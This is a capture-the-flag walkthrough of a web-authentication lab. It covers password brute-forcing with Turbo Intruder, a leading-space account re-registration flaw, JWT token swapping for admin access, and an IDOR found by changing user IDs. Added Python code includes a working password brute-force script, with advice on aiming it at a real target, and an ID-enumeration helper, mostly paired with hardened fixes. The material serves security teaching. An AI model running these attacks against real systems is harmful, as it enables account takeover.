Authenticate
First, launch your virtual machine.
Next, browse to the web page at <machine IP>:8888, for example 10.10.15.23:8888. You will see this web page displayed.
As you can see, the first flag is done for you by the creator of the room: the username is Jack and the password is 123456. Use those credentials to get the first flag.
Before you try to crack the password with Intruder, I want to show you another option within Burp Suite called Turbo Intruder. It is a lot faster than the built-in Intruder. To find it, go to the Extender tab and then the BApp Store tab. Search for "Intruder" to narrow the list of apps; Turbo Intruder should appear near the top. On the right-hand side of the screen you will see a description of Turbo Intruder and an Install button. Click Install.
Once it is installed, go over to the Extensions tab to confirm that Turbo Intruder is in fact loaded.
Now it is time to put your Burp Suite skills to work. You need to find the password for a new user named mike. Before you try logging in as mike with a random password, fire up Burp Suite. Once Burp is up and running, try to log into mike's account so you can intercept the traffic.
Here you can see the traffic was intercepted by Burp; I tried logging in with Username: mike and Password: admin. It didn't work, so now it's time to send this request over to Turbo Intruder. Right-click on the request and look for the option "Send to turbo intruder".
Here you can see the request was sent over to Turbo Intruder. You have to make two adjustments before you can start.
1. Tell Turbo Intruder which value the wordlist should populate. In this case you are brute-forcing the password, so replace the password you guessed with "%s".
2. Tell Turbo Intruder where the wordlist is located. Look in the script for the line beginning "for word in open" followed by a file path shown in pink, and change that path to the location of your rockyou.txt file.
In this screenshot you will notice the changes have been made, so now click the Attack button at the bottom of the screen.
Another window will pop up and Turbo Intruder will start working through the passwords, reporting each attempt. One password will return a 302 status. Click on it and you will see the request and response for that attempt; the redirect address shows the login was successful because it contains "logged". You can stop the attack and try this password.
** You may want to find a password list on GitHub of the top 1000 passwords. This will shorten your wait time; even with Turbo Intruder this is not a fast process.
Once you log in as mike you will see the flag for the question in task 2.
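To make the Turbo Intruder steps above concrete, here is the same loop as a stand-alone Python script (added example, not the room's code and not Turbo Intruder's own script, which runs inside Burp and queues many connections in parallel). It assumes, as a hypothetical, that the login form POSTs `username` and `password` to `/login`, that a wrong guess returns 200, and that a correct one returns a 302 whose Location contains "logged", which is the signal the walkthrough looks for. The target server, credential and wordlist in the block are constructed so the script runs offline.

```python
"""Stand-alone password brute force mirroring the Turbo Intruder workflow.
Added example; the login path, field names and the fake target are assumptions."""
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

LOGIN_PATH = "/login"        # hypothetical form action
SUCCESS_MARKER = "logged"    # substring of the redirect that marks a good login


def no_redirect_opener():
    """Opener that refuses to follow 302s, so the status code stays visible."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None
    return urllib.request.build_opener(NoRedirect)


def try_password(opener, base_url, username, password):
    """One attempt; returns (status, Location) like a row in Turbo Intruder's table."""
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(base_url + LOGIN_PATH, data=data, method="POST")
    try:
        with opener.open(req, timeout=5) as resp:
            return resp.status, resp.headers.get("Location", "")
    except urllib.error.HTTPError as e:      # 3xx/4xx/5xx land here
        return e.code, e.headers.get("Location", "")


def is_success(status, location):
    """The walkthrough's tell: a 302 to an address containing 'logged'."""
    return status == 302 and SUCCESS_MARKER in location


def brute_force(base_url, username, words):
    """Iterate the wordlist; each word takes the place of '%s' in the request."""
    opener = no_redirect_opener()
    for word in words:
        word = word.rstrip("\n")
        status, location = try_password(opener, base_url, username, word)
        if is_success(status, location):
            return word
    return None


class _FakeLogin(BaseHTTPRequestHandler):
    """Constructed stand-in for the target; NOT the room's server."""
    secret = {"mike": "pumpkin"}   # hypothetical credential

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        pw = form.get("password", [""])[0]
        if self.path == LOGIN_PATH and self.secret.get(user) == pw:
            self.send_response(302)
            self.send_header("Location", "/logged")
            self.end_headers()
        else:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"Invalid credentials")

    def log_message(self, *args):    # keep the demo quiet
        pass


def demo():
    """Run the attack against the local fake; returns the recovered password."""
    server = HTTPServer(("127.0.0.1", 0), _FakeLogin)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        base = "http://127.0.0.1:%d" % server.server_address[1]
        # Constructed mini wordlist standing in for rockyou.txt or a top-1000 list.
        wordlist = ["admin\n", "123456\n", "password\n", "pumpkin\n", "letmein\n"]
        return brute_force(base, "mike", wordlist)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(demo())
```

Against a real target, point `base_url` at the machine and pass `open("rockyou.txt")` as `words`; the script stops at the first 302, the same moment you would stop the Turbo Intruder attack. Note that this loop is sequential, which is exactly why Turbo Intruder's multi-connection engine is so much faster, and that a short, curated list usually finds a weak password long before rockyou.txt is exhausted.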
The next task looks at vulnerabilities in re-registration. In the directions, you are instructed to register an account for Darren. As you will soon discover, you cannot register that account because the username is already in use.
Now let's include a space before darren (' darren') and try to register that user.
Now that you have registered darren with a leading space, it's time to log in and get the flag. Use the password you created to log in. You should see the flag for the darren account (the one with no space). Here you will see the flag for this question.
Let's try the same thing for the Arthur account as instructed.
Once you have registered Arthur's new account, try to log in with the password you created and make sure to add a space before arthur. Log in and you should see the flag for this question.
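Why does a leading space hand you darren's flag? The registration check and the later profile lookup disagree about what a username is. The following is an added Python reconstruction of that pattern (not the room's code; the account names, passwords and flags are constructed), with a hardened version beside it that normalizes the name once and uses the same normalized key on every path:

```python
"""Registration/login mismatch that lets ' darren' shadow 'darren'.
Added example reconstructing the flaw; not the room's code. Data is constructed."""
import re
import unicodedata


class VulnerableUsers:
    """Uniqueness is checked on the raw string, but the profile lookup trims it."""

    def __init__(self):
        self.passwords = {"darren": "s3cret", "arthur": "hunter2"}   # constructed
        self.flags = {"darren": "FLAG{darren}", "arthur": "FLAG{arthur}"}

    def register(self, username, password):
        if username in self.passwords:          # ' darren' != 'darren', so it passes
            return False
        self.passwords[username] = password
        return True

    def login(self, username, password):
        """Returns the identity the session will use, or None."""
        if self.passwords.get(username) != password:
            return None
        return username.strip()                  # trimmed here: ' darren' -> 'darren'

    def private_page(self, identity):
        return self.flags.get(identity)


def canonical(username):
    """One normalization applied everywhere: unicode-fold, trim, lowercase."""
    return unicodedata.normalize("NFKC", username).strip().casefold()


class HardenedUsers:
    """Same API; every lookup goes through canonical(), and odd names are rejected."""

    NAME_RE = re.compile(r"^[a-z0-9_]{3,32}$")

    def __init__(self):
        self.passwords = {"darren": "s3cret", "arthur": "hunter2"}   # constructed
        self.flags = {"darren": "FLAG{darren}", "arthur": "FLAG{arthur}"}

    def register(self, username, password):
        name = canonical(username)
        # ' darren' and 'Darren' collide with darren; 'dar ren' fails the pattern
        if not self.NAME_RE.match(name) or name in self.passwords:
            return False
        self.passwords[name] = password
        return True

    def login(self, username, password):
        name = canonical(username)
        if self.passwords.get(name) != password:
            return None
        return name

    def private_page(self, identity):
        return self.flags.get(identity)
```

The fix is not "strip the space at registration" on its own; it is making registration, login and every lookup agree on a single canonical form, and rejecting names that cannot survive it. Case-folding and NFKC normalization close the obvious variants (Darren, fullwidth characters) that a trim alone would leave open.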
For the next task we need to use port 5000. Here is what you should see on the new web page.
Now enter the username and password. However, before you authenticate, fire up Burp Suite and have it ready to intercept the traffic.
In Burp Suite you will see the captured traffic. As you can see, a JWT is issued for this session.
After you click Authenticate and then Go, you will see a message like the one below. We need to change the session token so we can get admin access.
To change the token, right-click on the web page and choose "Inspect Element" (this is for those of you using Firefox).
Now move over to the Storage tab; on the left-hand side you should see Local Storage. This is where you will find the JWT you need to change.
You need to replace it with the new JWT from the instructions.
Double-click on the token and you can paste in the new JWT you got from the task. As you can see, the JWT matches the screenshot above.
Now hit Go and you will see that you have admin access and a new message appears.
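The swap works because the page trusts whatever token sits in Local Storage, and the token the task hands you is one the server will accept. The added Python example below (standard library only; not the room's code, and the secret, claim names and tokens are constructed, with HS256 and a `role` claim assumed for illustration) shows the two things worth understanding here: reading a JWT's claims without the key, which is all the browser's storage tab lets you do, and why simply editing the `role` claim in your own token would not have worked against a server that verifies signatures:

```python
"""JWT claims inspection versus signature verification. Added example; the
secret, claim names, algorithm and tokens are assumptions, not the room's values."""
import base64
import hashlib
import hmac
import json

SECRET = b"constructed-demo-secret"   # stands in for the server's signing key


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def make_jwt(payload: dict, secret: bytes) -> str:
    """Mint an HS256 token the way the server would."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def decode_unverified(token: str):
    """What you can do from the Storage tab: read header and claims, no key needed."""
    h, p, _ = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p))


def verify(token: str, secret: bytes):
    """Server-side check: returns the claims only if the signature is valid."""
    try:
        h, p, s = token.split(".")
    except ValueError:
        return None
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":          # pin the algorithm; never trust alg from the token
        return None
    expected = hmac.new(secret, (h + "." + p).encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


def forge_role(token: str, role: str) -> str:
    """Edit the payload only, keeping the old signature (what a naive tamper does)."""
    h, p, s = token.split(".")
    payload = json.loads(b64url_decode(p))
    payload["role"] = role
    return h + "." + b64url(json.dumps(payload, separators=(",", ":")).encode()) + "." + s


if __name__ == "__main__":
    user_token = make_jwt({"sub": "user", "role": "user"}, SECRET)
    admin_token = make_jwt({"sub": "admin", "role": "admin"}, SECRET)
    print("claims in the admin token:", decode_unverified(admin_token)[1])
    print("forged token accepted?", verify(forge_role(user_token, "admin"), SECRET) is not None)
```

Run `decode_unverified` on both the token Burp captured and the one from the task to see exactly which claim differs; that is the claim the server's authorization decision hangs on. The broader caveat a practitioner should take from this task: a JWT in Local Storage is readable by any script running on the page, so an XSS bug leaks the session outright, whereas an HttpOnly cookie at least keeps the raw token out of reach of script.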
For the next task switch over to port 7777. You should see this page.
As instructed you need to create a user.
You will see that you have successfully created your account.
Go and visit your "private space" and pay attention to the user ID 1 in the web address.
As instructed, change the 1 to a 2 and see what happens; you should see the screen below.
Now we need to find the super admin for this application. I tried user 0 (UID 0, root-level access) and it worked; you can see the password and the last flag.
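Changing the number in the address and getting someone else's page is an insecure direct object reference: the server looks up whatever ID the URL names and never asks whether the logged-in user may see it. The added Python example below (not the room's code; the user table, IDs and flag are constructed, and ID 0 plays the part of the super-admin record) puts the vulnerable lookup beside the hardened one and walks the IDs the way the walkthrough does by hand:

```python
"""IDOR on a 'private space' page: vulnerable lookup versus object-level
authorization. Added example with a constructed user table; not the room's code."""

# Constructed records; 0 stands in for the super-admin account found in the room.
USERS = {
    0: {"name": "superadmin", "role": "admin", "secret": "FLAG{constructed}"},
    1: {"name": "me", "role": "user", "secret": "my private notes"},
    2: {"name": "someone_else", "role": "user", "secret": "their private notes"},
}


def private_space_vulnerable(requested_id, session_user_id):
    """Serves whichever ID is in the URL; the session is never consulted."""
    return USERS.get(requested_id)


def private_space_hardened(requested_id, session_user_id):
    """Object-level check: you may read your own record, or any record if admin."""
    caller = USERS.get(session_user_id)
    if caller is None:
        return None                                # not logged in
    if requested_id != session_user_id and caller["role"] != "admin":
        return None                                # a real app answers 403 here
    return USERS.get(requested_id)


def enumerate_ids(fetch, session_user_id, candidates=range(0, 5)):
    """What the walkthrough does by hand: try each ID and note which ones answer."""
    return [i for i in candidates if fetch(i, session_user_id) is not None]


if __name__ == "__main__":
    print("vulnerable, logged in as 1:", enumerate_ids(private_space_vulnerable, 1))
    print("hardened, logged in as 1:  ", enumerate_ids(private_space_hardened, 1))
```

The fix is the authorization check, not hiding the ID: switching to random identifiers only slows enumeration down, while the hardened lookup refuses the request regardless of how the caller learned the ID. Note too that the check compares the requested ID against the server-side session, never against anything the client sent.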
I hope you enjoyed this room. Falconfeast did a great job showing the different kinds of vulnerabilities a web page can have. I know I learned a lot from this.